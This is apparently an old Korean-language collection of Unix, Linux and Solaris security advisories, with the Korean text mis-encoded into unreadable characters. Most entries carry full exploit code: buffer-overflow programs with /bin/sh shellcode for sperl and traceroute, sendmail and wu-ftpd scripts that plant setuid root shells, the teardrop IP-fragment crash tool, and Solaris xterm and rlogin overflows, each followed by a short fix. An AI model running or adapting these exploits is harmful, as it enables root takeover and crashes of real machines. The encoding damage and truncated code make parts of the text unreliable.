    sperl5.003
    Àû¿ëµÇ´Â È£½ºÆ®
    Linux Slackware 3.1, 3.2
    —¡µåÇÞ ¸®´ª½º
    ¹®Á¦Á¡
    sperl5.003 À̶ó´Â ÆÄÀÏÀ» ¹öÆÛ ¿À¹öÇ×ο츦 ½Ãų¼ö ÀÖ´Ù.

    #include
    #define DEFAULT_OFFSET 640
    #define DEFAULT_BUFFER_SIZE 1600
    #define NOP 0x90
    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
    }
    void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
    }
    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL);
    }
    ÇØ°á
    sperl5.003 ÀÇ suid bit¸¦ ¾ø¾Ö¶ó.
    ¾Æ´Ï¸é 5.003_97f ÀÇ ¹öÁ‾À¸—Î ¹Ù²Ù¾î¶ó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º sysctl()
    ¸í—É
    sysctl()
    Àû¿ëµÇ´Â ½Ã½ºÅÛ
    Linux prior to 2.0.31
    ¹®Á¦Á¡
    sysctl()À̶ó´Â ÇÔ¼ö¿¡ ¹®Á¦°¡ ÀÖ´Ù. syslog floodingÀÌ °¡´ÉÇϸç..
    ¿À¹öÇ×ο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â º¸¾È»ó ¹®Á¦Á¡ÀÌ ¹ß°ßµÇ¾ú´Ù.
    #include
    main() {
    sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
    /* 0x80000000 can be replaced with 0xC0000000 -- both are negative,
    * and
    * produce a zero when multiplied by sizeof(int) */
    }
    ÀÌ¿Í °°Àº ¹®Á¦Á¡Àº getgroups()¶ó´Â ÇÔ¼ö¿¡¼µµ ¸¶Âù°¡Áö´Ù.
    ÇØ°á
    ¹Ýµå½Ã 2.0.31 ÀÎ »ç¶÷¸¸ °íÃĶó.
    /usr/src/linux/kernel.sysctl.c ÀÇ ÆÄÀϾȿ¡
    struct ctl_table_header *tmp;
    void *context;
    if (nlen == 0 || nlen >= CTL_MAXNAME) <= ÀÌ°ÍÀ»
    if (nlen <= 0 || nlen >= CTL_MAXNAME) <= À̗¸°Ô °íÃĶó.
    return -ENOTDIR;
    error = verify_area(VERIFY_READ,name,nlen*sizeof(int));
    ±×¸®°í ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó. Ä¿³Î ÄÄÆÄÀÏ.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º sendmail (1)
    ¸í—É
    sendmail( 8.7 ~ 8.8.2)
    ¿µÇâÀÖ´Â ½Ã½ºÅÛ
    ¼¾µå ¸ÞÀÏÀ» žÀçÇÑ ¸ðµç À‾´Ð½º
    ¹®Á¦Á¡
    ´ÙÀ½°ú °°Àº °£´ÜÇÑ ½ºÅ©¸³Æ®—Î —çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù.

    #/bin/sh
    #
    #
    # Hi !
    # This is exploit for sendmail smtpd bug
    # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
    # This shell script does a root shell in /tmp directory.
    # If you have any problems with it, drop me a letter.
    # Have fun !
    #
    #
    # ----------------------
    # ---------------------------------------------
    # ----------------- Dedicated to my beautiful lady
    ------------------
    # ---------------------------------------------
    # ----------------------
    #
    # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
    #
    #
    #
    echo 'main() '>>leshka.c
    echo '{ '>>leshka.c
    echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
    echo '} '>>leshka.c
    #
    #
    echo 'main() '>>smtpd.c
    echo '{ '>>smtpd.c
    echo ' setuid(0); setgid(0); '>>smtpd.c
    echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
    echo '} '>>smtpd.c
    #
    #
    cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
    ./leshka
    kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs
    "[:digit:]" "\n
    "|head -n 1`
    rm leshka.c leshka smtpd.c /tmp/smtpd
    /tmp/sh
    ÇØ°áÃ¥
    ³ôÀº ¹öÁ‾ÀÇ ¼¾µå¸ÞÀÏÀ» ¼³Ä¡ÇÏ´Â ±æ ¹Û¿¡ ¾ø´Ù.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º wu-FTP
    ¸í—É
    wu-FTP ( site exec )
    ¿µÇâÀÖ´Â ½Ã½ºÅÛ
    wu-ftp2.x ¸¦ ±òÀº ¸ðµç À‾´Ð½º ¹öÁ‾
    ¹®Á¦Á¡
    site exec ÀÇ Å« ¹ö±×—Î —çÆ® ±ÇÇÑÀ¸—Î µ¹¾Æ°¡´Â ftpÀÇ À߸øµÈ ¿À—ù—Î
    —çÆ®±ÇÇÑÀ¸—Πȣ½ºÆ®ÀÇ ÇÁ—αח¥À» ½ÇÇà½Ãų¼ö°¡ ÀÖ´Ù.
    cat > bug.c
    #include
    #include
    #include
    main()
    {
    seteuid(0);
    system("cp /bin/sh /tmp/.sh");
    system("chmod 6777 /tmp/.sh");
    }
    À§ÀÇ ¼Ò½º¸¦ cc -o bug bug.c —Î ÄÄÆÄÀÏ ÈÄ¿¡ ftp —Î ÀÚ½ÅÀÇ È£½ºÆ®¿¡ Á¢¼Ó
    ÇÑ´Ù.
    ±× ¿¹ÀÌ´Ù.
    ftp 0
    220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r
    eady.
    Name (0:guest): guest
    331 Password required for guest.
    Password: (password)
    230 User guest logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> quote "site exec bash -c id" (see if sys is exploitable)
    200-bash -c id
    200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users)
    200 (end of 'bash -c id')
    ftp> quote "site exec bash -c /home/guest/bug"
    200-bash -c /home/guest/bug
    200 (end of 'bash -c /home/guest/bug')
    ftp> quit
    À§¿Í °°ÀÌ Çϸé bug¶ó´Â ÇÁ—αח¥ÀÌ —çÆ® ±ÇÇÑÀ¸—Î µ¹¾Æ°¡°Ô µÈ´Ù.
    ±×—¸°Ô µÇ¸é /tmp µð—ºÅ丮¿¡ —çÆ®±ÇÇÑÀÇ ½©ÀÌ ¸¸µé¾îÁø´Ù.
    ÇØ°á
    ftp ¹öÁ‾À» ÃÖ½ÅÀ¸—Î ¸ÂÃß¾î¶ó.
    2.4.2¹öÁ‾ÀÌ¸é ¹«³ÇÏ´Ù.
    ¶ÇÇÑ ÀǽÉÇÏ´Â ¾ÆÀ̵ð´Â site ¸í—ÉÀ» »ç¿ëÇÏÁö ¸øÇÏ°Ô Á¦ÇÑÀ» µÎ¾î¶ó
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º sendmail (2)
    ¸í—É
    sendmail 8.8.4
    ½Ã½ºÅÛ
    ¼¾µå¸ÞÀÏ 8.8.4¸¦ ¿î¿µÇÏ´Â ¸ðµç ½Ã½ºÅÛ
    ¹®Á¦Á¡
    ¼¾µå ¸ÞÀÏÀÇ À߸øµÈ ¹ö±×—Î ÀÎÇØ /var/tmp¿¡ dead.letterÀ̶ó´Â ÆÄÀÏÀ»
    ¸¸µå´Âµ¥ ÀÌ´Â —çÆ®ÀÇ ±ÇÇÑÀÌ´Ù.
    ±× ¿¹
    ln -s /.rhosts /var/tmp/dead.letter
    telnet white.hacker.securi.ty 25
    mail from : security@wh.it.e.best
    rcpt to : Fuck@fuck.you.haha
    data
    dlfjs qjrmrk dlTska..
    .
    quit
    À̗¸°Ô ÇÔÀ¸—Î½á —çÆ® µð—ºÅ丮¿¡ .rhosts ÆÄÀÏÀ» ¸¸µé¼ö ÀÖ´Ù.
    À̸¦ Á»´õ ÀÀ¿ëÇϸé Æнº¿öµå ÆÄÀÏÀ» ¼Õº¼¼ö ÀÖ´Ù.
    ÇØ°áÃ¥
    ¼¾µå¸ÞÀÏ À» 8.8.5 ÀÌ»óÀ¸—Î ¿Ã—Á¶ó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Lizards game
    ¸í—É
    Lizards game
    ½Ã½ºÅÛ
    ½½—¢¿þ¾î 3.4
    ¹®Á¦Á¡
    Lizards °ÔÀÓÀº setuid°¡ °É—ÁÀÖ´Â ÇÁ—αח¥ÀÌ´Ù.
    setuid °¡ °É—Á ÀÖ´Â ÀÌÀ‾´Â ¹Ù—Î ÀÌ °ÔÀÓÀÌ svgalib¸¦ »ç¿ëÇϱ⠶§¹®ÀÌ´Ù.
    ±×—±µ¥ ±× °ÔÀÓÀÇ ¼Ò½º¸¦ º¸¸é system(clear);¶ó°í ÇÔ¼ö¸¦ »ç¿ëÇß´Ù.
    ÀÌ´Â »ç¿ëÀÚÀÇ ÀÔÀåÀ¸—Î º¸¸é °£´ÜÈ÷ ±¸¸ÛÀ» ¹ß°ßÇÒ ¼ö ÀÖ´Ù.
    path=. ¶ó°í µÎ°í clear ½ºÅ©¸³Æ®¸¦ ÀÛ¼ºÇÏ¿© ±× clear½ºÅ©¸³Æ®¸¦
    —çÆ®ÀÇ ±ÇÇÑÀ¸—Î µ¹¸±¼ö ÀÖ´Ù.
    ÇØ°áÃ¥
    ¿ì¼± ±× ÆÄÀÏÀÇ Æ۹̼ÇÀ» ´Ý¾ÆµÎ¾î¶ó.
    chmod -s /usr/games/lizardlib/lizardshi
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º IP fragment overlap
    ¸í—É
    IP fragment overlap
    ½Ã½ºÅÛ
    ¸®´ª½º / À©µµ¿ì NT / À©µµ¿ì 95 / ±âŸ À‾´Ð½º ½Ã½ºÅÛ
    ¹®Á¦Á¡
    ¾Æ—¡ÀÇ ÇÁ—αח¥À» µ¹—Á¼ ½Ã½ºÅÛÀ» ¸ØÃß°Ô ÇÒ ¼ö ÀÖ´Ù.
    /*
    * Copyright (c) 1997 route|daemon9
    * 11.3.97
    *
    * Linux/NT/95 Overlap frag bug exploit
    *
    * Exploits the overlapping IP fragment bug present in all Linux
    * kernels and NT 4.0 / Windows 95 (others?)
    *
    * Based off of: flip.c by klepto
    * Compiles on: Linux, *BSD*
    *
    * gcc -O2 teardrop.c -o teardrop
    * OR
    * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
    */
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #ifdef STRANGE_BSD_BYTE_ORDERING_THING
    /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0
    */
    #define FIX(n) (n)
    #else /* OpenBSD 2.1, all Linux */
    #define FIX(n) htons(n)
    #endif /* STRANGE_BSD_BYTE_ORDERING_THING */
    #define IP_MF 0x2000 /* More IP fragment en route */
    #define IPH 0x14 /* IP header size */
    #define UDPH 0x8 /* UDP header size */
    #define PADDING 0x1c /* datagram frame padding for first packet */
    #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 *
    /
    #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
    * withstand maybe 5 or 10 sometimes... Experiment.
    */
    void usage(u_char *);
    u_long name_resolve(u_char *);
    u_short in_cksum(u_short *, int);
    void send_frags(int, u_long, u_long, u_short, u_short);
    int main(int argc, char **argv)
    {
    int one = 1, count = 0, i, rip_sock;
    u_long src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;
    fprintf(stderr, "teardrop route|daemon9\n\n");
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
    perror("raw socket");
    exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on
    e))
    < 0)
    {
    perror("IP_HDRINCL");
    exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]
    )))
    {
    fprintf(stderr, "What the hell kind of IP address is that?\n");
    exit(1);
    }
    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
    switch (i)
    {
    case 's': /* source port (should be emphemeral) */
    src_prt = (u_short)atoi(optarg);
    break;
    case 't': /* dest port (DNS, anyone?) */
    dst_prt = (u_short)atoi(optarg);
    break;
    case 'n': /* number to send */
    count = atoi(optarg);
    break;
    default :
    usage(argv[0]);
    break; /* NOTREACHED */
    }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count) count = COUNT;
    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");
    for (i = 0; i < count; i++)
    {
    send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
    fprintf(stderr, "b00m ");
    usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
    }
    /*
    * Send two IP fragments with pathological offsets. We use an implementati
    on
    * independent way of assembling network packets that does not rely on any
    of
    * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
    */
    void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
    u_short dst_prt)
    {
    u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
    u_char byte; /* a byte */
    struct sockaddr_in sin; /* socket protocol structure */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;
    /*
    * Grab some memory for our packet, align p_ptr to point at the beginnin
    g
    * of our packet, and then fill it with zeros.
    */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    byte = 0x45; /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4; /* IP checksum filled in by kernel *
    /
    *((u_long *)p_ptr) = src_ip; /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip; /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si
    n,
    sizeof(struct sockaddr)) == -1)
    {
    perror("\nsendto");
    free(packet);
    exit(1);
    }
    /* We set the fragment offset to be inside of the previous packet's
    * payload (it overlaps inside the previous packet) but do not include
    * enough payload to cover complete the datagram. Just the header will
    * do, but to crash NT/95 machines, a bit larger of packet seems to wor
    k
    * better.
    */
    p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade
    r */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4; /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);
    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
    void usage(u_char *name)
    {
    fprintf(stderr,
    "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\
    n",
    name);
    exit(0);
    }

    ÇØ°áÃ¥
    Ä¿³ÎÀ» 2.0.32-pre4 —Î ¾÷Çضó.
    or
    ¼Ò½º¸¦ ´ÙÀ½°ú °°ÀÌ ¹Ù²ã¼ ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó
    --- ip_fragment.c Mon Nov 10 14:58:38 1997
    +++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997
    @@ -12,6 +12,7 @@
    * Alan Cox : Split from ip.c , see ip_input.c for
    history.
    * Alan Cox : Handling oversized frames
    * Uriel Maimon : Accounting errors in two fringe case
    s.
    + * route : IP fragment overlap bug
    */
    #include
    @@ -578,6 +579,22 @@
    frag_kfree_s(tmp, sizeof(struct ipfrag));
    }
    }
    +
    + /*
    + * Uh-oh. Some one's playing some park shenanigans on us.
    + * IP fragoverlap-linux-go-b00m bug.
    + * route 11.3.97
    + */
    +
    + if (offset > end)
    + {
    + skb->sk = NULL;
    + printk("IP: Invalid IP fragment (offset > end) found from %
    s\n", in_ntoa(iph->saddr));
    + kfree_skb(skb, FREE_READ);
    + ip_statistics.IpReasmFails++;
    + ip_free(qp);
    + return NULL;
    + }
    /*
    * Insert this fragment in the chain of fragments.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º pppd chatscript
    ¸í—É
    µ¥ºñ¾È pppd chatscript
    ½Ã½ºÅÛ
    µ¥ºñ¾È ¸®´ª½º
    ¹®Á¦Á¡
    /var/log/ppp.log ÆÄÀÏÀ» ´©±¸³ª ´Ù ÀÐÀ»¼ö ÀÖ°Ô Çسõ¾Ò´Ù.
    $> more /var/log/ppp.log
    ¾î¼±¸ Àú¼±¸.
    Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it
    Dec 14 16:43:14 gateway chat[362]: send (loginname^M)
    Dec 14 16:43:15 gateway chat[362]: expect (word)
    Dec 14 16:43:15 gateway chat[362]: : loginname^M
    Dec 14 16:43:15 gateway chat[362]: Password -- got it
    Dec 14 16:43:15 gateway chat[362]: send (³ªÀÇÆнº¿öµå^M)
    À̗± Çü½ÄÀ¸—Î ³»¿ëÀ» º¸¸é Æнº¿öµå°¡(^^;) º¸ÀδÙ.
    ÇØ°áÃ¥
    ÆÐÄ¡µÈ ¹öÁ‾ÀÌ ¾ø´Â°Í °°´Ù. ^^;
    Áö±ÝÀº ³ª¿ÔÀ» °ÍÀÌ´Ù. ¹öÁ‾À» ¿Ã—Á¶ó
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º X ¼¹ö
    ¸í—É
    X¼¹ö- XFree 3.3.1 3.2.9 3.1.2 ÀÇ XF86_½Ã¸®Áî
    ½Ã½ºÅÛ
    ¿¢½º¼¹ö¸¦ ¾´´À ¸ðµç À‾´Ð½º¹× ¸®´ª½º
    ¹®Á¦Á¡
    ´ÙÀ½°ú °°Àº Æí¹ýÀ¸—Î ùÁÙÀÇ ÆÄÀÏÀ» º¼¼ö°¡ ÀÖ´Ù.
    $ ls -al /etc/shadow
    -rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
    $ id
    uid=502(loveyou) gid=500(users) groups=500(users)
    $ cd /usr/X11R6/bin
    $ ./XF86_SVGA -config /etc/shadow
    Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
    use: X [:] [option]
    -a # mouse acceleration (pixels)
    -ac disable access control restrictions
    -audit int set audit trail level
    -auth file select authorization file
    bc enable bug compatibility
    -bs disable any backing store support
    -c turns off key-click

    À̗± Çü½ÄÀÌ´Ù..
    ÇØ°áÃ¥
    Setuid ¸¦ ¾ø¾Ö´øÁö Æ‾Á¤ ÀÌ¿ëÀÚ¸¸ ¾²µµ—Ï Çã¶ôÇضó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º —¡µåÇÞ 5.0 À‾Æ¿¸®Æ¼
    ¸í—É
    /bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh
    (actually glibc2 is guilty one)
    ½Ã½ºÅÛ
    —¡µåÇÞ 5.0
    ¹®Á¦Á¡
    ¹öÆÛ ¿À¹ö—±À» ÀÌ¿ëÇؼ —çÆ®¸¦ ¾ò´Â´Ù.
    /*
    Just Your Standard EGGSHELL Proggie:
    traceroute buffer overflow exploit for RedHat Linux 5.0
    mostly ripped from Aleph One
    Wilton Wong
    wwong@blackstar.net
    gcc -o trace_shell trace_shell.c
    */
    #include
    #define DEFAULT_OFFSET 0
    #define DEFAULT_BUFFER_SIZE 1019
    #define DEFAULT_EGG_SIZE 2048
    #define NOP 0x90
    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
    }
    void main(int argc, char *argv[]) {
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i, eggsize=DEFAULT_EGG_SIZE;
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);
    if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
    }
    if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
    }
    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';
    memcpy(egg,"EGG=",4);
    putenv(egg);
    memcpy(buff,"RET=",4);
    putenv(buff);
    printf("Now run: /usr/sbin/traceroute $RET\n");
    system("/bin/bash");
    }

    ÇØ°áÃ¥
    ÆÐÄ¡ ¹æ¹ý
    $ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
    --- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997
    +++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997
    @@ -321,7 +321,7 @@
    u_char *answer; /* buffer to put answer */
    int anslen; /* size of answer */
    {
    - char nbuf[MAXDNAME];
    + char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/
    const char *longname = nbuf;
    int n;
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º crontab
    ¸í—É
    dillon crontab / crond ( dcron 2.2 )
    ½Ã½ºÅÛ
    ½½—º¿þ¾î 3.4
    ¹®Á¦Á¡
    ¹öÆÛ ¿À¹ö Ç×ο츦 ÀÌ¿ëÇؼ —çÆ®¸¦ ¾òÀ»¼ö ÀÖ´Ù.
    ÀáÀçÀûÀÎ ¹öÆÛ ¿À¹ö Ç×οìÀÇ °¡´É¼ºÀÌ º¸ÀδÙ.
    ÇØ°áÃ¥
    ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼ ÆÐÄ¡ ¹öÁ‾À» ¹Þ´Â´Ù.
    ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz
    ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz
    ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º xterm
    ¸í—É
    xterm
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.5.1(SunOS 5.5.1)
    ¹®Á¦Á¡
    ¹öÆÛ ¿À¹ö Ç×ο츦 ÀÏÀ¸ÄÑ º¸¾È»ó ÇêÁ¡À» ¸¸µé¼ö ÀÖ´Ù.

    ±× ¿¹Á¦ÀÌ´Ù.
    /*
    * X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97
    *
    */
    #include
    #include
    #include
    #include
    #define EXTRA2 1300
    #define BUF_LENGTH 400
    #define EXTRA 500
    /* Need an addr such that contents of addr+0xe98 = 0 */
    #define SAFE_ADDR ((unsigned)0xefff2008)
    #define STACK_OFFSET 0x4800
    #define SPARC_NOP 0xa61cc013
    u_long sparc_shellcode[] =
    {
    "½©ÄÚµå"
    };
    u_long get_sp(void)
    {
    asm("mov %sp,%i0 \n");
    }
    char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
    char longvar[0x4000] = "BLAH=";
    void main(int argc, char *argv[])
    {
    char *env[2];
    unsigned long targ_addr;
    u_long *long_p;
    int i, code_length = sizeof(sparc_shellcode),dso=0;
    if(argc > 1) dso=atoi(argv[1]);
    long_p =(u_long *) buf;
    for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
    *long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;
    for (i = 0; i < code_length / sizeof(u_long); i++)
    *long_p++ = sparc_shellcode[i];
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;
    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    /* This is just to shove the stack down a bit */
    memset(&longvar[5], 'a', sizeof longvar-6);
    longvar[sizeof longvar -1] = '\0';
    env[0] = longvar;
    env[1] = NULL;
    execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
    perror("execl failed");
    }

    ÇØ°áÃ¥
    ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼ ¿ÍÆÛ¸¦ ±¸Çشٰ¡ ¼³Ä¡Ç϶ó.
    ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper
    /overflow_wrapper.c
    or
    http://cegt201.bradley.edu/~im14u2c/wrapper/
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º ff.core
    ¸í—É
    /usr/openwin/bin/ff.core
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.4
    ¹®Á¦Á¡
    IFS=/À» ÀÌ¿ëÇؼ /usr/??ÇÁ—αח¥À» µ¹¸®—Á´Â ff.core ÆÄÀÏÀÇ º»—¡ ÃëÁö¸¦
    ¹þ¾î³ª usr ÇÁ—αח¥À» µ¹¸®°í ±× µÚÀÇ °ÍµéÀº Àμö—νá ÀÛ¿ëÇÏ°Ô ¸¸µç´Ù.
    ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù.
    % ksh
    % cd /tmp
    % cp /bin/ksh .
    % echo "chown root ksh; chmod u+s ksh" > usr
    % chmod +x usr
    % export IFS=/
    % ÇÑÁÙÀÇ ¾î¶² ¸í—É ..
    % ./ksh
    #
    ÇØ°áÃ¥
    ÆÐÄ¡Çضó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º gethostbyname()
    ¸í—É
    gethostbyname()
    ½Ã½ºÅÛ
    ¼Ö¶ó¸®½º 2.5 2.5.1
    ¹®Á¦Á¡
    ¹öÆÛ ¿À¹ö Ç×ο츦 ÀÏÀ¸ÄѼ ½©À» ½ÇÇà½ÃŲ´Ù..—çÆ® ¼ÒÀ‾—Î.
    ±× ¿¹Á¦ÀÌ´Ù.
    /*
    * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
    * by exploiting the gethostbyname() overflow in rlogin.
    *
    * gcc -o rlogin-exploit rlogin-exploit.c
    *
    * Jeremy Elson, 18 Nov 1996
    * jeremy.elson@nih.gov
    */
    #include
    #include
    #include
    #include
    #define BUF_LENGTH 8200
    #define EXTRA 100
    #define STACK_OFFSET 4000
    #define SPARC_NOP 0xa61cc013
    u_char sparc_shellcode[] ="½©ÄÚµå";

    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }
    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode);
    long_p = (u_long *) buf;
    for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i out & (and go to sleep).
